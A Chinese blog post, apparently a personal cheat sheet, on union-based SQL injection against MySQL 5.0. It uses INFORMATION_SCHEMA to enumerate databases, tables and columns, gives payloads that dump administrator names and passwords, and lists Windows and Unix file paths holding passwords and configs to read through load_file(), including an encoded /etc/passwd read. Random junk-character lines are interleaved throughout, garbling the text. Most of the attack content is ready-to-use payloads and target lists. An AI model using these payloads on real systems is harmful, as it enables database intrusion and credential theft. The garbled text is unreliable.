mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


/ _1 {6 H- m' |2 e
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
; z9 g) V" W& A( A: z( Z9 O* L中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
0 ^: n0 t; G( w  R1.得到所有数据库名：
! U) T" W; O+ P9 G- p9 \8 v|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

! R" ]9 R% s5 \  s/ l& X- Z|—字段：COLUMN_NAME ->该字段的名称

$ \* w! z6 Z* }+ w( U: R. {( m#########################################################################
  u" f4 l; ~8 v2 J% Y##
8 E% o6 G2 n8 N" t6 I
0×001 获取系统信息:

union select 1,2,3,4,5,concat
. u7 t1 R8 h3 h9 Z7 z& T3 S+ O(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*

' A) y3 f$ A. p4 `2 Q; _2 o: |@@global.version_compile_os 获取系统版本

" V+ y- Z" i, G. v- N0 f$ @: M@@datadir 数据库路径
database() 当前数据库名称
+ M8 S$ l2 Q8 F2 i/ w  V) d4 `8 G& b0x3c62723e 换行HEX值
1 ]2 Z; F8 d% i% u4 L
' D; e' F9 v( j) _1 I/ [6 ~9 p*/

######################################################################
6 D" m3 R3 p  V2 o% v+ M/ R# I7 `
3 k* z6 S! y* {# b0×002 获取表名
& w: C# d% K% p* _; G4 F
3 p/ z$ G. B/ h" Q  P6 l+ `union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
9 Q0 S& }, X3 b! n! u+ |' e, G
, Z- y) `7 }7 K3 M/ k- u/*
" |) y4 [3 o( _, L# V& h0 |/ G
0x67617264656e 为当前数据库名

0 Y: L( E) r3 d0 x" ggroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

2 Y* C# |4 ]$ }" }*/
& H# m( \6 E7 o3 U; g4 j: Y
: ?6 P" E% e6 T, {8 y  X, l# U######################################################################

; q, {& P( S8 ~% P: w0×003 获取字段

4 X! b" K# X/ J% munion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
6 y+ e# U5 S5 j: {" u+ g8 }' B

  |$ x, m! K8 R, mtable_schema=0x67617264656e limit 1 /*

$ g* z, R/ K  N/ _5 Q/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
' V* }5 |! \. T( C, m4 Z
" E7 T, C' m( D% ?3 `( J' J0x61646d696e ->选择一个表
. ^% T) c5 A) f0 M! c. M
0x67617264656e ->数据库名
1 O! I, |7 A4 m5 Q/ O1 H1 ~
*/

7 T+ G' ^/ M1 Z4 ~#####################################################################
: g5 e1 D  \6 T& u3 D. z/ C
0×004 获取数据
2 [. p  u. g- U1 G! e+ h4 t# M; b
; m  H- Q2 H" V+ c! U( Q) cunion select 1,2,3
! c4 [  K+ k5 Y% \,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

3 T" o) D) A5 d* K; y- r$ ]8 ]union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

/*

$ L& h; |- P/ ?7 I' W0 X& h; R0x3c62723e 换行符号HEX编码
. `* b* U$ {# A' y$ ]
group_concat 同时获得该字段所有数据

# k0 G- S' r- P2 a3 W& W) l*/

5 R+ j/ Y. {/ F8 }$ ]" B

$ h" ^/ Z) e& u. N

5 S: L" J2 @) O( f7 i# W1 O2 d顺便添加一些mysql注入时非常有用的一些东西
4 U! ?, q( j( ]" @
, u  \) w& q/ j, O3 [7 t6 L简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

4 B4 V6 r% w' ]1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
/ n+ T, L0 \7 @  p# M( r6:version()     MYSQL数据库版本
2 _- P% f7 j* }) y' V" \/ H. g7:load_file()   MYSQL读取本地文件的函数
) T& a' x3 F' X4 R( J6 d8@datadir     读取数据库路径
. t+ |' A& T( m1 j1 X( v/ b9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
$ y! {' C, L. R* [$ n0 O$ j. F收集的一些路径：
. D: C) M% ]9 ~: R% BWINDOWS下:
c:/boot.ini          //查看系统版本
, h: M" {  R" X2 d3 Q# n% u: _c:/windows/php.ini   //php配置信息
; S1 d/ y, ~' H+ l% L* A! M7 a' mc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
5 S$ S% G. Q$ \" H- \4 hc:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
% r" N. e5 j/ L$ y4 b7 L: Lc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
7 O' }7 j5 F% d/ r! _c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
& K: |* C3 `" D. h3 L' _c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
) u* L9 A* S9 L- Y% Q; M0 vC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
0 n: A$ _8 H9 rc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
+ U4 l* ^* _: X' {# X( q5 ?

c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
4 R( b- x4 D) t. A6 F* b3 Ld:\APACHE\Apache2\conf\httpd.conf
' ]5 k  k, e' Y& pC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
/ z7 b7 X6 _, G/ Q# s) R+ k8 l% RC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
# z6 U) Y. i- j5 A, ?
LUNIX/UNIX下:
# A9 o, I( n1 l. w/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
. z3 O! R% x" F' A/ k/usr/local/app/php5/lib/php.ini //PHP相关设置
: }/ l% A# T: b1 T/etc/sysconfig/iptables //从中得到防火墙规则策略
9 R2 W9 K) v" P/etc/httpd/conf/httpd.conf // apache配置文件
; U5 e: z8 I& f6 q/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
$ w1 S' t* l% s* A' h/etc/issue
0 k# l- S1 N& z& Z/etc/issue.net
5 S, m0 f% |' ?: K/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
% u" u4 |* J6 g+ M0 |# z1 o3 O$ @( \/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
+ s; t) [; {  v. P9 o; {% G/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
+ |* h2 B) n; Q$ I/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
' {6 g. L' Z6 W! N. x+ G; M/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
& T% a$ N) Y. z/ O( ^' w# e' V" S/etc/sysconfig/iptables 查看防火墙策略
  v6 {5 r& h. @' L: M  Nload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
- S/ x  i/ E2 A* \! P$ treplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
2 k- {1 ?% _: w0 c- p& k上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
" x) o" X& v+ @. K
& `1 Y% a2 k; E3 I